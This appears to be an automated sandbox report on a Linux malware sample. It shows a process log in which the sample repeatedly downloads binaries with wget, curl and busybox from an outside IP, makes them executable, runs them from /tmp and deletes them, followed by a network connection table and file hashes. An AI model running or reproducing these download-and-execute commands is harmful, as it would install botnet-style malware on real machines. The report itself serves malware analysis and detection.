/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| US | 151.101.193.91:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |